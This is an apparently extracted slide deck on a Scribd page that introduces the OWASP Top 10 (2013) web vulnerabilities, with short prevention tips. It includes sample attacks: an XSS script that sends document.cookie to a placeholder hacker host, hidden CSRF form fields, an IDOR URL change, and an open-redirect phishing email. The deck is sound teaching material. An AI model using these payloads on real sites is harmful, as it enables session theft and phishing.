Scribd Logo
Încărcați

Bine ați venit la Scribd!

  • Forecepts Tech Sharing OWASP Top 10 (2013)

    Încărcat de

    Chen Lee Peng
    89 vizualizări29 pagini
    Brief introduction of the Open Web Application Security Project top 10 vulnerabilities

    Drepturi de autor

    © Attribution Non-Commercial (BY-NC)

    Formate disponibile

    PPTX, PDF, TXT sau citiți online pe Scribd

    Vi se pare util acest document?

    Este necorespunzător acest conținut?

    Raportați acest document
    Brief introduction of the Open Web Application Security Project top 10 vulnerabilities

    Drepturi de autor:

    Attribution Non-Commercial (BY-NC)
    Descărcați ca PPTX, PDF, TXT sau citiți online pe Scribd
    Indicator pentru conținut neadecvat
    89 vizualizări29 pagini

    Forecepts Tech Sharing OWASP Top 10 (2013)

    Încărcat de

    Chen Lee Peng
    Brief introduction of the Open Web Application Security Project top 10 vulnerabilities

    Drepturi de autor:

    Attribution Non-Commercial (BY-NC)
    Descărcați ca PPTX, PDF, TXT sau citiți online pe Scribd
    Indicator pentru conținut neadecvat
    din 29

    Forecepts Technical Sharing OWASP 2013

    Sep 2013

    What Hackers Want to Do?

    Gain Access

    Websit e

    Sabotage

    Steal Information

    Security Impacts
    Technical Impact Business Impact

    Company Image
    Data Corruption

    Lost of Credential
    Malfunction

    Information Leaking

    Legal Issues

    OWASP Top 10
    A1

    Injection A2 Broken Authentication and Session Management A3 Cross-Site Scripting (XSS) A4 Insecure Direct Object References A5 Security Misconfiguration A6 Sensitive Data Exposure A7 Missing Function Level Access Control A8 - Cross-Site Request Forgery (CSRF) A9 - Using Components with Known Vulnerabilities A10 Unvalidated Redirects and Forwards

    A1 Injection

    A1 Injection Prevention

    Use PARAMETERS Validate Inputs SCAN!!

    A2 Broken Authentication and Session Management


    buy.com/product.php?id=50&PHPSSID=3289434
    Jobs, look at this product, they only sell $299

    Welcome Jared [Logout]

    OK

    Ah Ha!

    Jared

    Jobs

    Buy Now

    A2 Broken Authentication and Session Management


    Scenario #2 Applications timeouts arent set properly. User uses a public computer to access site. Instead of selecting logout the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated.

    A2 Broken Authentication and Session Management


    Scenario #3 Password stored in clear text

    A2 Broken Authentication and Session Management - Prevention No cookie-less session Timeout mechanism Password encryption SCAN!!

    A3 Cross-Site Scripting (XSS)


    My Wonder Page

    Comments <script type=text/javascript> location.href = http:/www.playboy.com; </script>

    Submit Comment

    A3 Cross-Site Scripting (XSS)


    My Wonder Page

    Comments <script type=text/javascript> location.href = http:/www.hackerside.com?cookie_id= + document.cookie; </script>

    Submit Comment

    A3 Cross-Site Scripting (XSS) Prevention


    Escape

    data Validate input Plan input properly SCAN!!

    A4 Insecure Direct Object References


    Username jennette Password ******* Login

    www.abcfinance.com/viewprofile.php?id=50
    Welcome back Jennette Tan

    www.abcfinance.com/viewprofile.php?id=30
    Welcome back Peter Lim

    A4 Insecure Direct Object References

    If directory listing not turned off, files in userfiles that suppose to be accessed by users only might exposed to everyone

    A4 Insecure Direct Object References

    Httpdocs/lib/MyBizClass.class.php

    What if I access http://www.abc.com/lib/MyBizClass.class.php directly?

    A4 Insecure Direct Object References - Prevention Scan NOT AVAILABLE PLAN, PLAN, PLAN Be careful of AJAX! Block direct access Control your file types Be careful of log file / backup file

    A5 Security Misconfiguration
    Default DB password Direct DB access Directory listing Exposed stack trace

    A5 Security Misconfiguration
    Work closely with hosting SCAN!!

    A6 Sensitive Data Exposure

    Sensitive data stored in clear text Missing SSL while transmitting sensitive data Unsalted hash / hash w/o key

    A6 Sensitive Data Exposure Prevention


    NEVER keep sensitive files to the public ENCRYPT, ENCRYPT, ENCTYPE SSL Disable form auto complete SCAN!!

    A7 Missing Function Level Access Control


    Username normaluser Password ******* Login

    www.abcfinance.com/member_listing.php
    Welcome back Jennette Tan

    www.abcfinance.com/user_management.php

    A7 Missing Function Level Access Control

    A7 Missing Function Level Access Control Prevention

    LAZY is a SIN Save trouble now, more trouble later

    A8 - Cross-Site Request Forgery (CSRF)


    Website A
    Welcome back Jennette Tan

    Hacker Website

    Click to Win $10000 <input type=hidden name=terget_uid value=109> <input type=hidden name=amount value=9999>

    Inserted by hacker using XSS

    Process_payment.php

    A8 - Cross-Site Request Forgery (CSRF) Prevention Using Token SCAN!!

    A9 - Using Components with Known Vulnerabilities


    Normally

    detectable by Vulnerability scanner Hosting engineer need to update security patches regularly

    A10 Unvalidated Redirects and Forwards


    www.citibank.com/redirect.php?url=XXXXXX
    Hacker Email

    Dear customer We are running a campaign to update your bank credit card information. Participant will win a chance for lucky draw of $10000

    www.citibank.com/redirect.php?url=hac kersite.com/creditcard-form.php

    A10 Unvalidated Redirects and Forwards


    Validate host of redirect URL Use numbers / code instead of URL SCAN!!

    S-ar putea să vă placă și